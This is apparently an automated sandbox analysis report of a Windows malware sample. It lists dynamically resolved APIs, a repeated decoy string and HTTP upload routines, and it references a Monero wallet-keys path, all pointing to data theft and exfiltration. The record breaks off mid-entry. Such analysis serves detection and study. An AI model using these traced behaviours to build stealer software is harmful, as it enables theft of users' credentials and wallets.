15889->15892 15891 a576b9 15891->15764 15891->15765 15893 a57765 RegQueryValueExA 15892->15893 15894 a57780 RegCloseKey 15892->15894 15893->15894 15895 a57793 15894->15895 15895->15891 15896->15778 15898 a58a0c 15897->15898 15899 a589f9 GetProcessHeap HeapFree 15897->15899 15898->15814 15899->15898 15900->15814 15902 a5a7a0 lstrcpy 15901->15902 15903 a45119 15902->15903 15904 a447b0 2 API calls 15903->15904 15905 a45125 15904->15905 16061 a58ea0 15905->16061 15907 a45184 15908 a45192 lstrlen 15907->15908 15909 a451a5 15908->15909 15910 a58ea0 4 API calls 15909->15910 15911 a451b6 15910->15911 15912 a5a740 lstrcpy 15911->15912 15913 a451c9 15912->15913 15914 a5a740 lstrcpy 15913->15914 15915 a451d6 15914->15915 15916 a5a740 lstrcpy 15915->15916 15917 a451e3 15916->15917 15918 a5a740 lstrcpy 15917->15918 15919 a451f0 15918->15919 15920 a5a740 lstrcpy 15919->15920 15921 a451fd InternetOpenA StrCmpCA 15920->15921 15922 a4522f 15921->15922 15923 a458c4 InternetCloseHandle 15922->15923 15924 a58b60 3 API calls 15922->15924 15930 a458d9 codecvt 15923->15930 15925 a4524e 15924->15925 15926 a5a920 3 API calls 15925->15926 15927 a45261 15926->15927 15928 a5a8a0 lstrcpy 15927->15928 15929 a4526a 15928->15929 15931 a5a9b0 4 API calls 15929->15931 15934 a5a7a0 lstrcpy 15930->15934 15932 a452ab 15931->15932 15933 a5a920 3 API calls 15932->15933 15935 a452b2 15933->15935 15941 a45913 15934->15941 15936 a5a9b0 4 API calls 15935->15936 15937 a452b9 15936->15937 15938 a5a8a0 lstrcpy 15937->15938 15939 a452c2 15938->15939 15940 a5a9b0 4 API calls 15939->15940 15942 a45303 15940->15942 15941->15888 15943 a5a920 3 API calls 15942->15943 15944 a4530a 15943->15944 15945 a5a8a0 lstrcpy 15944->15945 15946 a45313 15945->15946 15947 a45329 InternetConnectA 15946->15947 15947->15923 15948 a45359 HttpOpenRequestA 15947->15948 15950 a458b7 InternetCloseHandle 15948->15950 15951 a453b7 15948->15951 15950->15923 15952 a5a9b0 4 API calls 15951->15952 15953 a453cb 15952->15953 15954 a5a8a0 lstrcpy 15953->15954 15955 a453d4 15954->15955 15956 a5a920 3 API calls 15955->15956 15957 a453f2 15956->15957 15958 a5a8a0 lstrcpy 15957->15958 15959 a453fb 15958->15959 15960 a5a9b0 4 API calls 15959->15960 15961 a4541a 15960->15961 15962 a5a8a0 lstrcpy 15961->15962 15963 a45423 15962->15963 15964 a5a9b0 4 API calls 15963->15964 15965 a45444 15964->15965 15966 a5a8a0 lstrcpy 15965->15966 15967 a4544d 15966->15967 15968 a5a9b0 4 API calls 15967->15968 15969 a4546e 15968->15969 15970 a5a8a0 lstrcpy 15969->15970 16062 a58ead CryptBinaryToStringA 16061->16062 16063 a58ea9 16061->16063 16062->16063 16064 a58ece GetProcessHeap RtlAllocateHeap 16062->16064 16063->15907 16064->16063 16065 a58ef4 codecvt 16064->16065 16066 a58f05 CryptBinaryToStringA 16065->16066 16066->16063 16070->15343 16313 a49880 16071->16313 16073 a498e1 16073->15350 16075 a5a740 lstrcpy 16074->16075 16248 a5a740 lstrcpy 16247->16248 16249 a50266 16248->16249 16250 a58de0 2 API calls 16249->16250 16251 a5027b 16250->16251 16252 a5a920 3 API calls 16251->16252 16253 a5028b 16252->16253 16254 a5a8a0 lstrcpy 16253->16254 16255 a50294 16254->16255 16256 a5a9b0 4 API calls 16255->16256 16257 a502b8 16256->16257 16314 a4988e 16313->16314 16317 a46fb0 16314->16317 16316 a498ad codecvt 16316->16073 16320 a46d40 16317->16320 16321 a46d63 16320->16321 16335 a46d59 16320->16335 16336 a46530 16321->16336 16325 a46dbe 16325->16335 16346 a469b0 16325->16346 16327 a46e2a 16328 a46ee6 VirtualFree 16327->16328 16330 a46ef7 16327->16330 16327->16335 16328->16330 16329 a46f41 16333 a589f0 2 API calls 16329->16333 16329->16335 16330->16329 16331 a46f26 FreeLibrary 16330->16331 16332 a46f38 16330->16332 16331->16330 16334 a589f0 2 API calls 16332->16334 16333->16335 16334->16329 16335->16316 16337 a46542 16336->16337 16339 a46549 16337->16339 16356 a58a10 GetProcessHeap RtlAllocateHeap 16337->16356 16339->16335 16340 a46660 16339->16340 16343 a4668f VirtualAlloc 16340->16343 16342 a46730 16344 a46743 VirtualAlloc 16342->16344 16345 a4673c 16342->16345 16343->16342 16343->16345 16344->16345 16345->16325 16347 a469c9 16346->16347 16351 a469d5 16346->16351 16348 a46a09 LoadLibraryA 16347->16348 16347->16351 16349 a46a32 16348->16349 16348->16351 16354 a46ae0 16349->16354 16357 a58a10 GetProcessHeap RtlAllocateHeap 16349->16357 16351->16327 16352 a46a8b 16352->16351 16355 a589f0 2 API calls 16352->16355 16353 a46ba8 GetProcAddress 16353->16351 16353->16354 16354->16351 16354->16353 16355->16354 16356->16339 16357->16352

                                        Executed Functions

                                        Function 00A59860 Relevance: 59.7, APIs: 33, Strings: 1, Instructions: 212libraryloaderCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 660 a59860-a59874 call a59750 663 a59a93-a59af2 LoadLibraryA * 5 660->663 664 a5987a-a59a8e call a59780 GetProcAddress * 21 660->664 666 a59af4-a59b08 GetProcAddress 663->666 667 a59b0d-a59b14 663->667 664->663 666->667 669 a59b46-a59b4d 667->669 670 a59b16-a59b41 GetProcAddress * 2 667->670 671 a59b4f-a59b63 GetProcAddress 669->671 672 a59b68-a59b6f 669->672 670->669 671->672 673 a59b71-a59b84 GetProcAddress 672->673 674 a59b89-a59b90 672->674 673->674 675 a59bc1-a59bc2 674->675 676 a59b92-a59bbc GetProcAddress * 2 674->676 676->675
                                        APIs
                                        • GetProcAddress.KERNEL32(75900000,01600CD8), ref: 00A598A1
                                        • GetProcAddress.KERNEL32(75900000,01600E10), ref: 00A598BA
                                        • GetProcAddress.KERNEL32(75900000,01600C60), ref: 00A598D2
                                        • GetProcAddress.KERNEL32(75900000,01600ED0), ref: 00A598EA
                                        • GetProcAddress.KERNEL32(75900000,01600E28), ref: 00A59903
                                        • GetProcAddress.KERNEL32(75900000,01608FF8), ref: 00A5991B
                                        • GetProcAddress.KERNEL32(75900000,015F6A00), ref: 00A59933
                                        • GetProcAddress.KERNEL32(75900000,015F6740), ref: 00A5994C
                                        • GetProcAddress.KERNEL32(75900000,01600CF0), ref: 00A59964
                                        • GetProcAddress.KERNEL32(75900000,01600E40), ref: 00A5997C
                                        • GetProcAddress.KERNEL32(75900000,01600F00), ref: 00A59995
                                        • GetProcAddress.KERNEL32(75900000,01600E70), ref: 00A599AD
                                        • GetProcAddress.KERNEL32(75900000,015F6900), ref: 00A599C5
                                        • GetProcAddress.KERNEL32(75900000,01600C78), ref: 00A599DE
                                        • GetProcAddress.KERNEL32(75900000,01600D38), ref: 00A599F6
                                        • GetProcAddress.KERNEL32(75900000,015F68C0), ref: 00A59A0E
                                        • GetProcAddress.KERNEL32(75900000,01600E88), ref: 00A59A27
                                        • GetProcAddress.KERNEL32(75900000,01600F90), ref: 00A59A3F
                                        • GetProcAddress.KERNEL32(75900000,015F67A0), ref: 00A59A57
                                        • GetProcAddress.KERNEL32(75900000,01601008), ref: 00A59A70
                                        • GetProcAddress.KERNEL32(75900000,015F6A20), ref: 00A59A88
                                        • LoadLibraryA.KERNEL32(01600F60,?,00A56A00), ref: 00A59A9A
                                        • LoadLibraryA.KERNEL32(01600FC0,?,00A56A00), ref: 00A59AAB
                                        • LoadLibraryA.KERNEL32(01601020,?,00A56A00), ref: 00A59ABD
                                        • LoadLibraryA.KERNEL32(01600FD8,?,00A56A00), ref: 00A59ACF
                                        • LoadLibraryA.KERNEL32(01600F78,?,00A56A00), ref: 00A59AE0
                                        • GetProcAddress.KERNEL32(75070000,01600FA8), ref: 00A59B02
                                        • GetProcAddress.KERNEL32(75FD0000,01600FF0), ref: 00A59B23
                                        • GetProcAddress.KERNEL32(75FD0000,016094F8), ref: 00A59B3B
                                        • GetProcAddress.KERNEL32(75A50000,01609360), ref: 00A59B5D
                                        • GetProcAddress.KERNEL32(74E50000,015F6820), ref: 00A59B7E
                                        • GetProcAddress.KERNEL32(76E80000,01608F68), ref: 00A59B9F
                                        • GetProcAddress.KERNEL32(76E80000,NtQueryInformationProcess), ref: 00A59BB6
                                        Strings
                                        • NtQueryInformationProcess, xrefs: 00A59BAA
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2137026012.0000000000A41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                        • Associated: 00000000.00000002.2136987282.0000000000A40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137026012.0000000000AF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137026012.0000000000AFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137026012.0000000000B22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137026012.0000000000C8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000C9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000E23000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000EFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000F21000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000F29000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000F37000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137443072.0000000000F38000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137642310.00000000010D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137654171.00000000010D2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_a40000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: AddressProc$LibraryLoad
                                        • String ID: NtQueryInformationProcess
                                        • API String ID: 2238633743-2781105232
                                        • Opcode ID: d4a59f602f4bfed9a7dbf046dc4d4abd8675d9508552893d2af30293f120fdc1
                                        • Instruction ID: 7963dd17b8e8aafce89e45cf7deda8877dbbc1c2229077dce0d60da07d12602a
                                        • Opcode Fuzzy Hash: d4a59f602f4bfed9a7dbf046dc4d4abd8675d9508552893d2af30293f120fdc1
                                        • Instruction Fuzzy Hash: D5A12BB5500240AFF344EFA9ED88B5E37F9F78C701704451BE609D32A4D739A852EB6A
                                        Function 00A445C0 Relevance: 56.1, APIs: 2, Strings: 30, Instructions: 148memoryCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 677 a445c0-a44695 RtlAllocateHeap 694 a446a0-a446a6 677->694 695 a446ac-a4474a 694->695 696 a4474f-a447a9 VirtualProtect 694->696 695->694
                                        APIs
                                        • RtlAllocateHeap.NTDLL(00000000), ref: 00A4460E
                                        • VirtualProtect.KERNEL32(?,00000004,00000100,00000000), ref: 00A4479C
                                        Strings
                                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00A44713
                                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00A44734
                                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00A44765
                                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00A446D8
                                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00A445C7
                                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00A445D2
                                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00A44770
                                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00A445E8
                                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00A4474F
                                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00A446C2
                                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00A44638
                                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00A44622
                                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00A446B7
                                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00A44657
                                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00A4477B
                                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00A44678
                                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00A446CD
                                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00A4475A
                                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00A44683
                                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00A44617
                                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00A44643
                                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00A44729
                                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00A4462D
                                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00A4466D
                                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00A44662
                                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00A445DD
                                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00A4473F
                                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00A4471E
                                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00A445F3
                                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00A446AC
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2137026012.0000000000A41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                        • Associated: 00000000.00000002.2136987282.0000000000A40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137026012.0000000000AF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137026012.0000000000AFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137026012.0000000000B22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137026012.0000000000C8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000C9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000E23000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000EFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000F21000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000F29000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000F37000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137443072.0000000000F38000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137642310.00000000010D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137654171.00000000010D2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_a40000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: AllocateHeapProtectVirtual
                                        • String ID: The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.
                                        • API String ID: 1542196881-2218711628
                                        • Opcode ID: e688f9d347356f896a888af6464c8b013c09d05ce864637262cf055c9076fdf6
                                        • Instruction ID: b5aff87f21487925bcad95a7f5fc97a5739ae03d128849ccd04088b51ea99fb1
                                        • Opcode Fuzzy Hash: e688f9d347356f896a888af6464c8b013c09d05ce864637262cf055c9076fdf6
                                        • Instruction Fuzzy Hash: F241E261BD660DFAC664FFF4F84EE9D76B67FDAB00F905844E810532D0CAB065004926
                                        Function 00A44880 Relevance: 28.5, APIs: 11, Strings: 5, Instructions: 479networkstringfileCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 801 a44880-a44942 call a5a7a0 call a447b0 call a5a740 * 5 InternetOpenA StrCmpCA 816 a44944 801->816 817 a4494b-a4494f 801->817 816->817 818 a44955-a44acd call a58b60 call a5a920 call a5a8a0 call a5a800 * 2 call a5a9b0 call a5a8a0 call a5a800 call a5a9b0 call a5a8a0 call a5a800 call a5a920 call a5a8a0 call a5a800 call a5a9b0 call a5a8a0 call a5a800 call a5a9b0 call a5a8a0 call a5a800 call a5a9b0 call a5a920 call a5a8a0 call a5a800 * 2 InternetConnectA 817->818 819 a44ecb-a44ef3 InternetCloseHandle call a5aad0 call a49ac0 817->819 818->819 905 a44ad3-a44ad7 818->905 829 a44ef5-a44f2d call a5a820 call a5a9b0 call a5a8a0 call a5a800 819->829 830 a44f32-a44fa2 call a58990 * 2 call a5a7a0 call a5a800 * 8 819->830 829->830 906 a44ae5 905->906 907 a44ad9-a44ae3 905->907 908 a44aef-a44b22 HttpOpenRequestA 906->908 907->908 909 a44ebe-a44ec5 InternetCloseHandle 908->909 910 a44b28-a44e28 call a5a9b0 call a5a8a0 call a5a800 call a5a920 call a5a8a0 call a5a800 call a5a9b0 call a5a8a0 call a5a800 call a5a9b0 call a5a8a0 call a5a800 call a5a9b0 call a5a8a0 call a5a800 call a5a9b0 call a5a8a0 call a5a800 call a5a920 call a5a8a0 call a5a800 call a5a9b0 call a5a8a0 call a5a800 call a5a9b0 call a5a8a0 call a5a800 call a5a920 call a5a8a0 call a5a800 call a5a9b0 call a5a8a0 call a5a800 call a5a9b0 call a5a8a0 call a5a800 call a5a9b0 call a5a8a0 call a5a800 call a5a9b0 call a5a8a0 call a5a800 call a5a920 call a5a8a0 call a5a800 call a5a740 call a5a920 * 2 call a5a8a0 call a5a800 * 2 call a5aad0 lstrlen call a5aad0 * 2 lstrlen call a5aad0 HttpSendRequestA 908->910 909->819 1021 a44e32-a44e5c InternetReadFile 910->1021 1022 a44e67-a44eb9 InternetCloseHandle call a5a800 1021->1022 1023 a44e5e-a44e65 1021->1023 1022->909 1023->1022 1024 a44e69-a44ea7 call a5a9b0 call a5a8a0 call a5a800 1023->1024 1024->1021
                                        APIs
                                          • Part of subcall function 00A5A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00A5A7E6
                                          • Part of subcall function 00A447B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00A44839
                                          • Part of subcall function 00A447B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00A44849
                                          • Part of subcall function 00A5A740: lstrcpy.KERNEL32(00A60E17,00000000), ref: 00A5A788
                                        • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00A44915
                                        • StrCmpCA.SHLWAPI(?,0160E9B0), ref: 00A4493A
                                        • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00A44ABA
                                        • lstrlen.KERNEL32(00000000,00000000,?,?,?,?,00A60DDB,00000000,?,?,00000000,?,",00000000,?,0160EA20), ref: 00A44DE8
                                        • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00A44E04
                                        • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00A44E18
                                        • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00A44E49
                                        • InternetCloseHandle.WININET(00000000), ref: 00A44EAD
                                        • InternetCloseHandle.WININET(00000000), ref: 00A44EC5
                                        • HttpOpenRequestA.WININET(00000000,0160EB70,?,0160E578,00000000,00000000,00400100,00000000), ref: 00A44B15
                                          • Part of subcall function 00A5A9B0: lstrlen.KERNEL32(?,016091B8,?,\Monero\wallet.keys,00A60E17), ref: 00A5A9C5
                                          • Part of subcall function 00A5A9B0: lstrcpy.KERNEL32(00000000), ref: 00A5AA04
                                          • Part of subcall function 00A5A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00A5AA12
                                          • Part of subcall function 00A5A8A0: lstrcpy.KERNEL32(?,00A60E17), ref: 00A5A905
                                          • Part of subcall function 00A5A920: lstrcpy.KERNEL32(00000000,?), ref: 00A5A972
                                          • Part of subcall function 00A5A920: lstrcat.KERNEL32(00000000), ref: 00A5A982
                                        • InternetCloseHandle.WININET(00000000), ref: 00A44ECF
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2137026012.0000000000A41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                        • Associated: 00000000.00000002.2136987282.0000000000A40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137026012.0000000000AF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137026012.0000000000AFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137026012.0000000000B22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137026012.0000000000C8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000C9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000E23000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000EFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000F21000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000F29000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000F37000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137443072.0000000000F38000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137642310.00000000010D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137654171.00000000010D2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_a40000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Internet$lstrcpy$lstrlen$CloseHandle$HttpOpenRequestlstrcat$ConnectCrackFileReadSend
                                        • String ID: "$"$------$------$------
                                        • API String ID: 460715078-2180234286
                                        • Opcode ID: 724a4c3c544b882c8ab98115026ff050bc7a2453f40e5583aaf12171c8c20b95
                                        • Instruction ID: 776f8bfc92f52d1495e3a43557c2f89761b3207d0b36c4192984cadcf43a8f62
                                        • Opcode Fuzzy Hash: 724a4c3c544b882c8ab98115026ff050bc7a2453f40e5583aaf12171c8c20b95
                                        • Instruction Fuzzy Hash: 3012FA72A10118AADB15EB90DE92FEEB778BF64301F504299B50662091EF702F4DCF66
                                        Function 00A578E0 Relevance: 4.5, APIs: 3, Instructions: 40memoryCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00A57910
                                        • RtlAllocateHeap.NTDLL(00000000), ref: 00A57917
                                        • GetComputerNameA.KERNEL32(?,00000104), ref: 00A5792F
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2137026012.0000000000A41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                        • Associated: 00000000.00000002.2136987282.0000000000A40000.00000004.00000001.01000000.00000003.sdmpDownload File
